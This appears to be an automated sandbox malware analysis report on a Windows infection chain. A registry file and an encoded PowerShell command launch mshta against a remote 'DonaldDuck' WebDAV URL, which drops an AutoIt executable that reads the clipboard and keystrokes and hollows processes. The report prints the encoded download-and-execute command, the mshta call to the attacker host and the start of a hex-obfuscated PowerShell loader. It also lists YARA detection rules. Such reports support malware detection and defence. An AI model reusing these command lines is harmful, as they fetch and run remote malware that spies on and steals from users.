      Source: mshta.exe, 00000003.00000002.2266312687.0000020567B2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2255393361.0000020567B2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2247357184.0000020567B2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2250278393.0000020567B2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2255829484.0000020567B2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck#==h
      Source: mshta.exe, 00000003.00000003.2251457783.000001FD64F9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2248766174.000001FD64F9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck#IE5P2
      Source: mshta.exe, 00000003.00000002.2266312687.0000020567B2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2255393361.0000020567B2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2247357184.0000020567B2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2250278393.0000020567B2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2255829484.0000020567B2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck#S
      Source: mshta.exe, 00000003.00000002.2266312687.0000020567B2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2255393361.0000020567B2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2247357184.0000020567B2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2250278393.0000020567B2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2255829484.0000020567B2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck#Z
      Source: powershell.exeString found in binary or memory: https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck$global:?
      Source: mshta.exe, 00000003.00000002.2267293448.000002056C040000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck&Y
      Source: mshta.exe, 00000003.00000003.2259299452.000001FD64F9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2251457783.000001FD64F9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2248766174.000001FD64F9C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2264087068.000001FD64F9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck)
      Source: mshta.exe, 00000003.00000002.2264321093.000001FD65020000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2248078541.000001FD65017000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2258761903.000001FD65017000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2259436232.000001FD6501F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2191192579.000001C2D4287000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2209666982.000001C2D4287000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck...
      Source: mshta.exe, 0000000C.00000003.2191192579.000001C2D4287000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2209666982.000001C2D4287000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck...)
      Source: mshta.exe, 00000003.00000003.2248078541.000001FD65017000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck...M/~
      Source: mshta.exe, 0000000C.00000003.2188728920.000001C2D42DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2210021955.000001C2D42DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck.IE5
      Source: mshta.exe, 00000003.00000002.2263967189.000001FD64F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck2
      Source: mshta.exe, 0000000C.00000002.2209666982.000001C2D4234000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck9F
      Source: mshta.exe, 00000003.00000002.2266418647.0000020567B3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2247357184.0000020567B39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2250278393.0000020567B39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2254039298.0000020567B39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2254394893.0000020567B3C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2256152035.0000020567B3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2263967189.000001FD64F60000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2210021955.000001C2D42A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2188728920.000001C2D42A2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2211501819.000001CAD643F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2209666982.000001C2D4210000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.1960856139.000001CAD643C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2188176032.000001CAD643C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckC:
      Source: mshta.exe, 00000003.00000002.2263967189.000001FD64F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckE
      Source: mshta.exe, 00000003.00000003.2259299452.000001FD64F9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2251457783.000001FD64F9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2248766174.000001FD64F9C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2264087068.000001FD64F9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckF
      Source: mshta.exe, 00000003.00000002.2264476392.000001FD651F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckH
      Source: mshta.exe, 0000000C.00000003.2191192579.000001C2D424C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckIE5P2
      Source: mshta.exe, 00000003.00000002.2263967189.000001FD64F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckL
      Source: mshta.exe, 00000003.00000002.2266418647.0000020567B3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2250278393.0000020567B39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2254039298.0000020567B39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2254394893.0000020567B3C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2256152035.0000020567B3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2211827997.000001CAD88E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckLMEM
      Source: mshta.exe, 00000003.00000003.2251457783.000001FD64F9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2248766174.000001FD64F9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckO
      Source: powershell.exe, 00000001.00000002.1884840308.000001B9A8325000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckP
      Source: mshta.exe, 0000000C.00000002.2209666982.000001C2D4234000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckRF
      Source: mshta.exe, 0000000C.00000003.2191551606.000001CAD8A35000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2194897159.000001CAD8A35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckSSC:
      Source: mshta.exe, 00000003.00000002.2263967189.000001FD64F60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckY
      Source: mshta.exe, 00000003.00000003.2259299452.000001FD64F9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2251457783.000001FD64F9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2248766174.000001FD64F9C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2264087068.000001FD64F9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckc
      Source: mshta.exe, 00000003.00000003.2259299452.000001FD64F9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2251457783.000001FD64F9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2248766174.000001FD64F9C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2264087068.000001FD64F9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckdeflate
      Source: powershell.exe, 0000000A.00000002.1960048322.000001760CB15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckh
      Source: mshta.exe, 0000000C.00000002.2209666982.000001C2D4234000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckhF
      Source: mshta.exe, 00000003.00000003.2257722200.000002056ACC5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2198134187.000001CAD8C05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckhttps://pwsh2.pajamas-stoic-failing.lol
      Source: mshta.exe, 00000003.00000002.2267069855.000002056BC60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckime
      Source: mshta.exe, 0000000C.00000002.2212150764.000001CAD89FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckn
      Source: mshta.exe, 00000003.00000002.2264582710.000001FD65250000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2210464976.000001C2D43E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckorer
      Source: mshta.exe, 00000003.00000002.2267069855.000002056BC60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckrei
      Source: mshta.exe, 00000003.00000002.2263967189.000001FD64F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckw
      Source: mshta.exe, 0000000C.00000002.2209666982.000001C2D4234000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckwF
      Source: mshta.exe, 00000003.00000002.2263967189.000001FD64F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck~
      Source: powershell.exe, 00000007.00000002.1981989752.0000014E37B8D000.00000004.00000800.00020000.00000000.sdmp, AutoIt3.exe.7.drString found in binary or memory: https://www.autoitscript.com/autoit3/
      Source: AutoIt3.exe.7.drString found in binary or memory: https://www.globalsign.com/repository/0
      Source: powershell.exe, 00000007.00000002.1981989752.0000014E37B8D000.00000004.00000800.00020000.00000000.sdmp, AutoIt3.exe.7.drString found in binary or memory: https://www.globalsign.com/repository/06
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49730 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49738 version: TLS 1.2
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001EF664 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,15_2_001EF664
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001EF8D3 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,15_2_001EF8D3
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001EF664 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,15_2_001EF664
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001DAA95 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,15_2_001DAA95
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_00209FB4 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,15_2_00209FB4
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015DF241 CreateDesktopA,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,WaitForSingleObject,15_2_015DF241

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: amsi64_7436.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
      Source: amsi64_7956.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
      Source: Process Memory Space: powershell.exe PID: 7436, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
      Source: Process Memory Space: powershell.exe PID: 7956, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
      Powershell drops PE file
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\AutoIt3.exeJump to dropped file
      Uses regedit.exe to modify the Windows registry
      Source: unknownProcess created: C:\Windows\regedit.exe "regedit.exe" "C:\Users\user\Desktop\Tweak.reg"
      Very long command line found
      Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 3225
      Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 3225
      Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 3225Jump to behavior
      Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 3225Jump to behavior
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015E26C9 GetCurrentProcessId,CreateProcessA,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,ResumeThread,Sleep,GetTickCount,15_2_015E26C9
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 16_2_01571A61 GetCurrentProcessId,CreateProcessA,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,ResumeThread,Sleep,GetTickCount,16_2_01571A61
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001DE3CB: CreateFileW,DeviceIoControl,CloseHandle,15_2_001DE3CB
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001D230F LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,15_2_001D230F
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001DF76E ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,15_2_001DF76E
      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_00183AD915_2_00183AD9
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001AE32F15_2_001AE32F
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001924CA15_2_001924CA
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001A659915_2_001A6599
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001FC84415_2_001FC844
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_0019C9C015_2_0019C9C0
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001929E315_2_001929E3
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_0018CBF015_2_0018CBF0
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001A6C0915_2_001A6C09
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001E2D8115_2_001E2D81
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_0017EE0015_2_0017EE00
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_0017CE2015_2_0017CE20
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_00192F2315_2_00192F23
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_0017707015_2_00177070
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_0018F0DA15_2_0018F0DA
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001D916815_2_001D9168
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_0020525A15_2_0020525A
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_0018D37F15_2_0018D37F
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_0019774615_2_00197746
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_0019797515_2_00197975
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_0019196415_2_00191964
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_00197BD215_2_00197BD2
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_0017DC7015_2_0017DC70
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001A9D1E15_2_001A9D1E
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_00191FC115_2_00191FC1
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015E201A15_2_015E201A
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015E202115_2_015E2021
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 16_2_015713B216_2_015713B2
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 16_2_015713B916_2_015713B9
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 16_2_0156149F16_2_0156149F
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\AutoIt3.exe 1DA298CAB4D537B0B7B5DABF09BFF6A212B9E45731E0CC772F99026005FB9E48
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: String function: 0019014F appears 40 times
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: String function: 0019488E appears 34 times
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: String function: 00191000 appears 41 times
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: String function: 0017FA3B appears 33 times
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
      Source: amsi64_7436.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Source: amsi64_7956.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Source: Process Memory Space: powershell.exe PID: 7436, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Source: Process Memory Space: powershell.exe PID: 7956, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Source: classification engineClassification label: mal100.spyw.evad.winREG@20/25@1/2
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001E4573 GetLastError,FormatMessageW,15_2_001E4573
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001D21C9 AdjustTokenPrivileges,CloseHandle,15_2_001D21C9
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001D27D9 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,15_2_001D27D9
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001E5D7E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,15_2_001E5D7E
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001DE2AB CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CompareStringW,CloseHandle,15_2_001DE2AB
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001D8056 CoCreateInstance,SetErrorMode,GetProcAddress,SetErrorMode,15_2_001D8056
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001E3DBD CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,15_2_001E3DBD
      Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRHJump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7964:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7448:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7736:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7032:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zlrxjdq2.zt2.ps1Jump to behavior
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\regedit.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Windows\regedit.exe "regedit.exe" "C:\Users\user\Desktop\Tweak.reg"
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -eNC LgAnAG0AcwBoAHQAYQAnAGgAdAB0AHAAcwA6AC8ALwBwAHcAcwBoADIALgBwAGEAagBhAG0AYQBzAC0AcwB0AG8AaQBjAC0AZgBhAGkAbABpAG4AZwAuAGwAbwBsAC8AdwBlAGIAZABhAHYALwByAGUAZwAvAEQAbwBuAGEAbABkAEQAdQBjAGsA
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function tCqzac($xDlOy){return -split ($xDlOy -replace '..', '0x$& ')};$SQYQyiT = tCqzac('2F92616FCA1E637E204E02A98BAB656B9EC67566C63384DBBA915194A26AF3C99FF78C879D2671A61F9DE3FFD05CE7A373EC6999C11F2AE65D883254059A8F5DD52C6EF70BFD4877EC5470233CCF8C213A8F6C3B33F727D7EFEF9E317E238D51754C64F55FD36A2589609D7C13781064CD0882248925DC090ED875EA7328A961D8F19BDA01E615861B627059F79049F57B3247A84C248BA78C08603403E1AE25A41B0A8E9DD38F8C4A4081D4274AE388388659516790B04238778E0F5658CC4E7B8F740A831B86CE3EFD019A79F77BE8F78EB2E2CA234D0C6D81A7CEACE3F908562BA1EA41EAB6FF399EF717AA496847BEFD1DEB1F7B5AA3887325ABF9EEF02FE6982E64EC9D3A2425D14C12AD043DC5C6031BE4743B30CB9771A566A007E065215522047C54A3A10753B2A266B4BE44ABB6CC95BD1C8F09E68F17760528BCA6460C89ABD112854B22D2A30FEFACBDAD91533869CBAA510D9AEE6DFA15E320B7AFD60201785519583AE149ADC0F90A8952F25FF47A4ED635E1B047ACFE73F6A3F4DE14C2A855847AF9BE35A9B33A08C7ABF7A00F27594B28D5E0FA51AA3F90BF24D901F140F816D5D4EBF7AA6FA485FDC8089FEF1D65D5798A7A7C513EFB05E816E80A2F1DDFE3BA76DA0E722B38F8740DCB9E6E71B59D4E4CDFAA9F2EF98D1569B8